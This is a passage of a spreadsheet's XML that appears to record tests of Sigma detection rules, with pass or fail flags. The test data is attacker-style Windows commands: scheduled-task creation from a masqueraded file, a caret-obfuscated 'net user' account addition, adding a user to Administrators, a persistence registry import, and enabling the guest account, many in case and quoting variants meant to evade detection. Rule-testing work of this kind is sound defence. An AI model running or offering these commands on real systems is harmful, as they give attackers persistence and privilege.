    <row r="156" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A156" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B156" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C156" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D156" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E156" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CReAtE /tn "SuspiciousTask" /"xml" "C:\temp\masqueraded_payload.txt" /f /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F156" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G156" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H156" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I156" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J156" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K156" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="157" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A157" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B157" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C157" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D157" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E157" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "SuspiciousTask" /"xml" "C:\temp\masqueraded_payload.txt" /f /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F157" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G157" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H157" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I157" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J157" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K157" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="158" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A158" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B158" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C158" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D158" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E158" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /"tn" "SuspiciousTask" -"xml" "C:\temp\masqueraded_payload.txt" /f /"tr" "dummy.xml"</t>
        </is>
      </c>
      <c r="F158" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G158" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H158" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I158" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J158" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K158" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="159" ht="15.75" customHeight="1" s="42">
      <c r="A159" s="43" t="n"/>
      <c r="B159" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C159" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D159" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E159" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
      <c r="F159" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G159" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H159" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I159" s="43" t="n"/>
      <c r="J159" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K159" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="160" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A160" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B160" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C160" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D160" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E160" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "SuspiciousTask" -"xml" "C:\temp\masqueraded_payload.txt" /f /TR "dummy.xml"</t>
        </is>
      </c>
      <c r="F160" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G160" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H160" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I160" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J160" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K160" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="161" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A161" s="43" t="n"/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</row>
    <row r="162" ht="15.75" customHeight="1" s="42">
      <c r="A162" s="36" t="inlineStr">
        <is>
          <t>t1037.001</t>
        </is>
      </c>
      <c r="B162" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_logon_script</t>
        </is>
      </c>
      <c r="C162" s="36" t="inlineStr">
        <is>
          <t>Potential Persistence Via Logon Scripts - CommandLine</t>
        </is>
      </c>
      <c r="D162" s="36" t="inlineStr">
        <is>
          <t>21d856f9-9281-4ded-9377-51a1a6e2a432</t>
        </is>
      </c>
      <c r="E162" s="36" t="inlineStr">
        <is>
          <t>reg import C:\Windows\Temp\persist.reg</t>
        </is>
      </c>
      <c r="F162" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G162" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H162" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I162" s="36" t="inlineStr">
        <is>
          <t>Potential Suspicious Registry File Imported Via Reg.EXE (62e0298b-e994-4189-bc87-bc699aa62d97)</t>
        </is>
      </c>
      <c r="J162" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K162" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="163" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A163" s="43" t="n"/>
      <c r="B163" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C163" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D163" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E163" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F163" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G163" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H163" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I163" s="43" t="n"/>
      <c r="J163" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K163" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="164" ht="15.75" customHeight="1" s="42">
      <c r="A164" s="43" t="n"/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</row>
    <row r="165" ht="15.75" customHeight="1" s="42">
      <c r="A165" s="36" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B165" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_autorun_registry_modified_via_wmic</t>
        </is>
      </c>
      <c r="C165" s="36" t="inlineStr">
        <is>
          <t>Suspicious Autorun Registry Modified via WMI</t>
        </is>
      </c>
      <c r="D165" s="36" t="inlineStr">
        <is>
          <t>c80e66d8-1780-48a9-b412-46663fd21ac0</t>
        </is>
      </c>
      <c r="E165" s="43" t="n"/>
      <c r="F165" s="43" t="n"/>
      <c r="G165" s="43" t="n"/>
      <c r="H165" s="43" t="n"/>
      <c r="I165" s="43" t="n"/>
      <c r="J165" s="43" t="n"/>
      <c r="K165" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="166" ht="15.75" customHeight="1" s="42">
      <c r="A166" s="43" t="n"/>
      <c r="B166" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C166" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D166" s="36" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E166" s="43" t="n"/>
      <c r="F166" s="43" t="n"/>
      <c r="G166" s="43" t="n"/>
      <c r="H166" s="43" t="n"/>
      <c r="I166" s="43" t="n"/>
      <c r="J166" s="43" t="n"/>
      <c r="K166" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="167" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A167" s="43" t="n"/>
      <c r="B167" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C167" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D167" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E167" s="36" t="inlineStr">
        <is>
          <t>wmic useraccount where name='guest' set passwordexpires=0</t>
        </is>
      </c>
      <c r="F167" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G167" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H167" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I167" s="43" t="n"/>
      <c r="J167" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K167" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="168" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A168" s="43" t="n"/>
      <c r="B168" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C168" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D168" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E168" s="36" t="inlineStr">
        <is>
          <t>net user guest /active:yes /expires:never /passwordchg:no</t>
        </is>
      </c>
      <c r="F168" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G168" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H168" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I168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68" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K168" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="169" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A169" s="43" t="n"/>
      <c r="B169" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C169" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D169" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E169" s="36" t="inlineStr">
        <is>
          <t>net user guest /active:yes /eXpIrEs:neVEr /pAssworDchG:nO</t>
        </is>
      </c>
      <c r="F169" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G169" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H169" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I169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69" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K169" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="170" ht="15.75" customHeight="1" s="42">
      <c r="A170" s="43" t="n"/>
      <c r="B170" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C170" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D170" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E170" s="36" t="inlineStr">
        <is>
          <t>net user guest /ActIve:yEs /expires:never /PaSSWOrDcHG:no</t>
        </is>
      </c>
      <c r="F170" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G170" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H170" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I170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0" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K170" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="171" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A171" s="43" t="n"/>
      <c r="B171" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C171" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D171" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E171" s="36" t="inlineStr">
        <is>
          <t>net user guest -"active:yes" /expires:never /passwordchg:no</t>
        </is>
      </c>
      <c r="F171" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G171" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H171" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I171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1" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K171" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="172" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A172" s="43" t="n"/>
      <c r="B172" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C172" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D172" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E172" s="36" t="inlineStr">
        <is>
          <t>net user guest /"active:yes" /expires:never /"passwordchg:no"</t>
        </is>
      </c>
      <c r="F172" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G172" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H172" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I172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2" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K172" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="173" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A173" s="43" t="n"/>
      <c r="B173" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C173" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D173" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E173" s="36" t="inlineStr">
        <is>
          <t>net user guest -"active:yes" /EXPIReS:NEVer /passwordchg:no</t>
        </is>
      </c>
      <c r="F173" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G173" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H173" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I173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3" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K173" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="174" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A174" s="43" t="n"/>
      <c r="B174" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C174" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D174" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E174" s="36" t="inlineStr">
        <is>
          <t>net user guest /active:yes -"expires:never" /passwordchg:no</t>
        </is>
      </c>
      <c r="F174" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G174" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H174" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I174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4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K174" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="175" ht="15.75" customHeight="1" s="42">
      <c r="A175" s="43" t="n"/>
      <c r="B175" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C175" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D175" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E175" s="36" t="inlineStr">
        <is>
          <t>net user guest /aCTIve:yEs /EXPIrES:NeVEr -"passwordchg:no"</t>
        </is>
      </c>
      <c r="F175" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G175" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H175" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I175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5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K175" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="176" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A176" s="43" t="n"/>
      <c r="B176" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C176" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D176" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E176" s="36" t="inlineStr">
        <is>
          <t>net user guest /"active:yes" -"expires:never" -"passwordchg:no"</t>
        </is>
      </c>
      <c r="F176" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G176" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H176" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I176" s="36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76" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K176" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="177" ht="15.75" customHeight="1" s="42">
      <c r="A177" s="43" t="n"/>
      <c r="B177" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C177" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D177" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E177" s="36" t="inlineStr">
        <is>
          <t>net user guest /active:Yes -"expires:never" /passwordchg:no</t>
        </is>
      </c>
      <c r="F177" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G177" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H177" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I177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7" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K177" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="178" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A178" s="43" t="n"/>
      <c r="B178" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C178" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D178" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E178" s="36" t="inlineStr">
        <is>
          <t>net user guest /aCtIve:yeS /expires:never /PASSworDChg:No</t>
        </is>
      </c>
      <c r="F178" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G178" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H178" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I178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78" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K178" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="179" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A179" s="43" t="n"/>
      <c r="B179" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C179" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D179" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E179" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-WmiObject -Class Win32_UserAccount -Filter \"Name='guest'\" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F179" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G179" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H179" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I179" s="43" t="n"/>
      <c r="J179" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K179" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="180" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A180" s="43" t="n"/>
      <c r="B180" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C180" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D180" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E180" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAnd "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -"Arguments" @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F180" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G180" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H180" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I180" s="43" t="n"/>
      <c r="J180" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K180" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="181" ht="15.75" customHeight="1" s="42">
      <c r="A181" s="43" t="n"/>
      <c r="B181" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C181" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D181" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E181" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAND "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -"Arguments" @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F181" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G181" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H181" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I181" s="43" t="n"/>
      <c r="J181" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K181" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="182" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A182" s="43" t="n"/>
      <c r="B182" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C182" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D182" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E182" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAnd "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F182" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G182" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H182" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I182" s="43" t="n"/>
      <c r="J182" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K182" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="183" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A183" s="43" t="n"/>
      <c r="B183" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C183" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D183" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E183" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMAnd "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance /"Arguments" @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F183" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G183" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H183" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I183" s="43" t="n"/>
      <c r="J183" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K183" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="184" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A184" s="43" t="n"/>
      <c r="B184" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C184" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D184" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E184" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance /"Arguments" @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F184" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G184" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H184" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I184" s="43" t="n"/>
      <c r="J184" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K184" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="185" ht="15.75" customHeight="1" s="42">
      <c r="A185" s="43" t="n"/>
      <c r="B185" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C185" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D185" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E185" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMANd "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -"Arguments" @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F185" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G185" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H185" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I185" s="43" t="n"/>
      <c r="J185" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K185" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="186" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A186" s="43" t="n"/>
      <c r="B186" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C186" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D186" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E186" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMand "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F186" s="36" t="b">
        <v>0</v>
      </c>
